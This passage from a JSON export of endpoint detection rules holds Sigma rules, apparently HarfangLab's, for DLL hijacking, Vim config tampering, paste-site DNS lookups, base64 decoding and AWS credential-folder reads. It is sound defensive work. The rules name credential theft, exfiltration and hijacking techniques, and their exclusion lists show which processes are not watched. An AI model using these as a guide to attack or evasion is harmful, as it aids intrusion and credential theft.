'\\wevtapi.dll'\n - '\\xmllite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa405235-fe36-482e-8102-ba29c2a94699",
"rule_name": "DLL Hijacking via TraceRpt.exe",
"rule_description": "Detects potential Windows DLL Hijacking via TraceRpt.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa567806-d013-44a4-a7d2-f0d80d501545",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.090322Z",
"creation_date": "2026-03-23T11:45:34.090324Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.090329Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_dstokenclean.yml",
"content": "title: DLL Hijacking via dstokenclean.exe\nid: fa567806-d013-44a4-a7d2-f0d80d501545\ndescription: |\n Detects potential Windows DLL Hijacking via dstokenclean.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'dstokenclean.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\dsclient.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa567806-d013-44a4-a7d2-f0d80d501545",
"rule_name": "DLL Hijacking via dstokenclean.exe",
"rule_description": "Detects potential Windows DLL Hijacking via dstokenclean.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa5fd8c4-73b1-449f-b1a2-bcc19d728a3a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.611998Z",
"creation_date": "2026-03-23T11:45:34.612002Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.612009Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://gtfobins.github.io/gtfobins/vim/",
"https://twitter.com/alh4zr3d/status/1631655900560629760?s=46&t=bmL9gNSzs4gNil-zD7vIRg",
"https://attack.mitre.org/techniques/T1543/",
"https://attack.mitre.org/techniques/T1037/"
],
"name": "t1543_vimrc_modified.yml",
"content": "title: Vim Configuration File Modified\nid: fa5fd8c4-73b1-449f-b1a2-bcc19d728a3a\ndescription: |\n Detects an attempt to modify the .vimrc Vim Configuration File or the ~/.vim/plugins file.\n Attackers can edit the Vim configuration file as a way to silently execute commands when vim is launched. This can be used to establish persistence or to exfiltrate data.\n It is recommended to investigate the .vimrc files via a job for any added suspicious commands and to analyze the process and user session responsible for the file edit to look for malicious actions.\nreferences:\n - https://gtfobins.github.io/gtfobins/vim/\n - https://twitter.com/alh4zr3d/status/1631655900560629760?s=46&t=bmL9gNSzs4gNil-zD7vIRg\n - https://attack.mitre.org/techniques/T1543/\n - https://attack.mitre.org/techniques/T1037/\ndate: 2023/05/03\nmodified: 2025/03/20\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1543\n - attack.t1037\n - classification.Linux.Source.Filesystem\n - classification.Linux.LOLBin.Vim\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.ConfigChange\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'write'\n Path|endswith:\n - '/.vimrc'\n - '/.vim/plugins'\n\n exclusion_docker:\n ProcessImage: '/usr/bin/dockerd'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\nconfidence: weak",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa5fd8c4-73b1-449f-b1a2-bcc19d728a3a",
"rule_name": "Vim Configuration File Modified",
"rule_description": "Detects an attempt to modify the .vimrc Vim Configuration File or the ~/.vim/plugins file.\nAttackers can edit the Vim configuration file as a way to silently execute commands when vim is launched. This can be used to establish persistence or to exfiltrate data.\nIt is recommended to investigate the .vimrc files via a job for any added suspicious commands and to analyze the process and user session responsible for the file edit to look for malicious actions.\n",
"rule_creation_date": "2023-05-03",
"rule_modified_date": "2025-03-20",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1037",
"attack.t1543"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fa66e677-615c-4f59-ae3f-767498335e97",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.625427Z",
"creation_date": "2026-03-23T11:45:34.625429Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.625433Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.mandiant.com/resources/blog/pick-six-intercepting-a-fin6-intrusion",
"https://attack.mitre.org/techniques/T1102/002/",
"https://attack.mitre.org/techniques/T1567/003/"
],
"name": "t1102_002_dns_resolution_text_storage_sites.yml",
"content": "title: DNS Resolution of Text Storage Website\nid: fa66e677-615c-4f59-ae3f-767498335e97\ndescription: |\n Detects a DNS resolution request to a text storage service such as Pastebin.\n Adversaries may use this type of website, which allows for the online storage of text for a set period of time, either as a means of sending commands to and receiving output from a compromised system or exfiltrating data.\n It is recommended to investigate the process at the origin of the DNS resolution to determine whether it is legitimately communicating with this text storage website.\nreferences:\n - https://www.mandiant.com/resources/blog/pick-six-intercepting-a-fin6-intrusion\n - https://attack.mitre.org/techniques/T1102/002/\n - https://attack.mitre.org/techniques/T1567/003/\ndate: 2023/12/06\nmodified: 2025/12/19\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1102.002\n - attack.t1071.001\n - attack.exfiltration\n - attack.t1567.003\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'pastebin.com'\n - 'paste.ee'\n - 'pastebin.pl'\n\n filter_browser:\n ProcessOriginalFileName:\n - 'firefox.exe'\n - 'chrome.exe'\n - 'brave.exe'\n - 'msedge.exe'\n - 'librewolf.exe'\n - 'opera.exe'\n - 'vivaldi.exe'\n - 'iexplore.exe'\n - 'msedgewebview2.exe'\n - 'zen.exe'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n ProcessSigned: 'true'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n 
ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_opera:\n ProcessImage|endswith: '\\opera.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_minionhost:\n ProcessOriginalFileName: 'MinionHost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Cybereason Inc'\n - 'Cybereason Inc.'\n - 'Cybereason, Inc'\n\n exclusion_kaspersky:\n ProcessOriginalFileName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_zsatunnel:\n ProcessOriginalFileName: 'ZSATunnel.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Zscaler, Inc.'\n\n exclusion_freecad:\n ProcessOriginalFileName: 'FreeCAD.exe'\n ProcessDescription: 'FreeCAD main executable'\n\n exclusion_gdlauncher:\n ProcessImage: '?:\\Program Files\\Java\\jre*\\bin\\java.exe'\n ProcessGrandparentImage: '?:\\Users\\\\*\\AppData\\Local\\Programs\\@gddesktop\\GDLauncher.exe'\n\n exclusion_tabletopesimulator:\n ProcessImage:\n - '?:\\Program Files (x86)\\Steam\\steamapps\\common\\Tabletop Simulator\\Tabletop Simulator.exe'\n - '?:\\Program Files\\Steam\\steamapps\\common\\Tabletop Simulator\\Tabletop Simulator.exe'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fa66e677-615c-4f59-ae3f-767498335e97",
"rule_name": "DNS Resolution of Text Storage Website",
"rule_description": "Detects a DNS resolution request to a text storage service such as Pastebin.\nAdversaries may use this type of website, which allows for the online storage of text for a set period of time, either as a means of sending commands to and receiving output from a compromised system or exfiltrating data.\nIt is recommended to investigate the process at the origin of the DNS resolution to determine whether it is legitimately communicating with this text storage website.\n",
"rule_creation_date": "2023-12-06",
"rule_modified_date": "2025-12-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1071.001",
"attack.t1102.002",
"attack.t1567.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fad314a5-5899-4ebb-b205-702c867a309b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.671484Z",
"creation_date": "2026-03-23T11:45:35.294692Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294697Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md",
"https://man7.org/linux/man-pages/man1/base64.1.html",
"https://attack.mitre.org/techniques/T1027/",
"https://attack.mitre.org/techniques/T1140/",
"https://attack.mitre.org/techniques/T1132/001/"
],
"name": "t1027_decoding_base64_linux.yml",
"content": "title: Base64 Data Decoded (Linux)\nid: fad314a5-5899-4ebb-b205-702c867a309b\ndescription: |\n Detects the usage of the base64 utility to decode base64 encoded data.\n This technique can be used by an attacker to hide a malicious payload and evade security defenses.\n It is recommended to check the decoded blob or file for malicious content and to check the behavioral context around the execution of this command to determine whether it is legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1027/T1027.md\n - https://man7.org/linux/man-pages/man1/base64.1.html\n - https://attack.mitre.org/techniques/T1027/\n - https://attack.mitre.org/techniques/T1140/\n - https://attack.mitre.org/techniques/T1132/001/\ndate: 2022/12/23\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027\n - attack.t1140\n - attack.command_and_control\n - attack.t1132.001\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.LOLBin.Base64\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Obfuscation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/base64'\n CommandLine|contains: ' -d'\n ParentImage|contains: '?'\n\n exclusion_commandline:\n CommandLine: 'base64 --decode'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/usr/bin/terraform|'\n - '|/tmp/.mount_cursor*/usr/share/cursor/cursor|'\n - '|/usr/share/cursor/cursor|'\n - '|/opt/SolarWinds/Agent/bin/Plugins/ADMProbe/SolarWinds.ADM.AgentPlugin|'\n - '|/opt/dynatrace/oneagent/agent/lib64/oneagentos|'\n - '|/usr/local/bin/docker-credential-pass|'\n\n exclusion_cron:\n ParentCommandLine:\n - '*sh /etc/cron.daily/brave'\n - '*sh /etc/cron.daily/google-chrome'\n - '*sh /etc/cron.daily/google-chrome-beta'\n - '*sh /etc/cron.daily/google-chrome-unstable'\n - '*sh /etc/cron.daily/chrome-remote-desktop'\n - '*sh 
/etc/cron.daily/microsoft-edge'\n - '*sh /etc/cron.daily/opera-browser'\n - '*sh /etc/cron.daily/vivaldi'\n\n exclusion_apt:\n - ParentCommandLine|startswith:\n - '/bin/sh /bin/apt-key '\n - '/bin/sh /usr/bin/apt-key '\n - GrandparentImage: '/usr/bin/dpkg'\n\n exclusion_prodigeadmin:\n ParentCommandLine|startswith:\n - '/bin/bash /prodige/admin/prodigeadmin/.pgih-bootstrap/s_meteo.sh '\n - '/bin/bash /prodige/admin/prodigeadmin/production/.pgih-scripts/pgihadmin'\n\n exclusion_azure_linux_ext:\n ParentCommandLine|startswith: '/bin/sh -c /usr/bin/base64 -d /tmp/tmp* | /usr/bin/openssl smime -inform der -decrypt -recip'\n\n exclusion_centreon:\n - ParentCommandLine|contains: '/usr/lib/centreon/plugins//check_powerscale_quotas.sh'\n - GrandparentCommandLine|contains: '/usr/lib/centreon/plugins//check_powerscale_quotas.sh'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/opt/containerd/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/containerd/bin/containerd-shim-runc-v2|'\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fad314a5-5899-4ebb-b205-702c867a309b",
"rule_name": "Base64 Data Decoded (Linux)",
"rule_description": "Detects the usage of the base64 utility to decode base64 encoded data.\nThis technique can be used by an attacker to hide a malicious payload and evade security defenses.\nIt is recommended to check the decoded blob or file for malicious content and to check the behavioral context around the execution of this command to determine whether it is legitimate.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027",
"attack.t1132.001",
"attack.t1140"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fadda78b-209a-41be-b9a6-9b99cb3c0f61",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082492Z",
"creation_date": "2026-03-23T11:45:34.082494Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082498Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_djoin.yml",
"content": "title: DLL Hijacking via djoin.exe\nid: fadda78b-209a-41be-b9a6-9b99cb3c0f61\ndescription: |\n Detects potential Windows DLL Hijacking via djoin.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'djoin.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\dbgcore.DLL'\n - '\\dbghelp.dll'\n - '\\JOINUTIL.DLL'\n - '\\logoncli.dll'\n - '\\netprovfw.dll'\n - '\\netutils.dll'\n - '\\wdscore.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "fadda78b-209a-41be-b9a6-9b99cb3c0f61",
"rule_name": "DLL Hijacking via djoin.exe",
"rule_description": "Detects potential Windows DLL Hijacking via djoin.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "fae7a83d-e36c-4641-801d-5ce8281bd8a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.296555Z",
"creation_date": "2026-03-23T11:45:35.296557Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.296562Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1552/001/"
],
"name": "t1552_004_aws_config_read_macos.yml",
"content": "title: Suspicious Read Access to User's AWS Configuration Folder\nid: fae7a83d-e36c-4641-801d-5ce8281bd8a8\ndescription: |\n Detects an attempt to read the contents of the AWS configuration folder.\n Adversaries may access to user's AWS configuration file in order to gather credentials and move to cloud environments.\n It is recommended to verify if the process performing the read operation has legitimate reason to do it.\nreferences:\n - https://attack.mitre.org/techniques/T1552/001/\ndate: 2024/06/18\nmodified: 2026/02/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1552.001\n - classification.macOS.Source.Filesystem\n - classification.macOS.Behavior.CredentialAccess\nlogsource:\n category: filesystem_event\n product: macos\ndetection:\n selection_version:\n # define minimum version for each branches\n - AgentVersion|gte|version: 3.6.13\n AgentVersion|lt|version: 3.7.0\n - AgentVersion|gte|version: 3.7.11\n AgentVersion|lt|version: 3.8.0\n - AgentVersion|gte|version: 3.8.3\n AgentVersion|lt|version: 3.9.0\n # all versions above are patched\n - AgentVersion|gte|version: 3.9.0\n selection_files:\n Kind: 'read'\n Path|startswith: '/Users/*/.aws/'\n ProcessImage|contains: '?'\n ProcessParentImage|contains: '?'\n\n filter_aws_cli:\n Image:\n - '/usr/local/aws-cli/aws'\n # launched by aws ssm start-session --target *--profile *\n - '/usr/local/sessionmanagerplugin/bin/session-manager-plugin'\n - '/usr/local/aws-cli/aws_completer'\n - '/Users/*/.asdf/installs/awscli/*/aws'\n - '/opt/homebrew/Cellar/granted/*/bin/granted'\n\n# Common exclusion\n ### system app ###\n filter_systemapp:\n Image:\n - '/System/Library/Services/*'\n - '/System/Library/PrivateFrameworks/*'\n - '/System/Library/CoreServices/*'\n - '/System/Library/Frameworks/CoreServices.framework/*'\n - '/System/Library/ExtensionKit/Extensions/*'\n - '/System/Library/Frameworks/*'\n - '/usr/sbin/filecoordinationd'\n exclusion_systemextension:\n Image|startswith: 
